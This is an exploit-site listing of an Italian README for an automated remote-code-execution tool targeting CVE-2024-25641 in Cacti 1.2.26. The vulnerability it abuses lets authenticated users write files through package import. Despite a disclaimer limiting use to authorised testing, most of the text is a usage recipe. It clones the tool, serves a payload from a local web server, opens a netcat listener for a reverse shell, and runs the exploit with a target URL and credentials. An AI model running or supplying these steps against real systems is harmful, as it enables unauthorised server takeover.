Sploitus

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

kitploit · 2026-08-26

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LEO-MITCH-CVE-2024-25641-RCE-AUTOMATED-EXPLOIT-CACTI-1.2.26
# CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Exploit completamente automatizzato per CVE-2024-25641. Quando un utente è autenticato, Cacti versione 1.2.26 è vulnerabile a una vulnerabilità di scrittura arbitraria di file, sfruttabile tramite la funzionalità "Importazione Pacchetti", consente agli utenti autenticati con il permesso "Importa Modelli" di eseguire codice PHP arbitrario sul server web (RCE).

Crediti a questo PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Ho semplicemente automatizzato questo per ottenere un punto d'appoggio.)

## ESCLUSIONE DI RESPONSABILITÀ

Questo strumento è destinato esclusivamente a scopi educativi e di test. L'autore di questo strumento non è responsabile per qualsiasi uso improprio o attività illegale eseguita con esso. Usa questo strumento solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test. L'accesso non autorizzato a sistemi informatici è illegale e non etico.

## Esempio di Utilizzo

root@kitploit:~
    
    
    # Clone the repository
    git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
    cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
    
    # Setup Python web server
    python -m http.server <PYTHON_WEB_SERVER_PORT>
    
    # Setup netcat listener
    nc -lvnp <LOCAL_PORT>
    
    # Run the tool
    pip install -r requirements.txt (if needed)
    python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>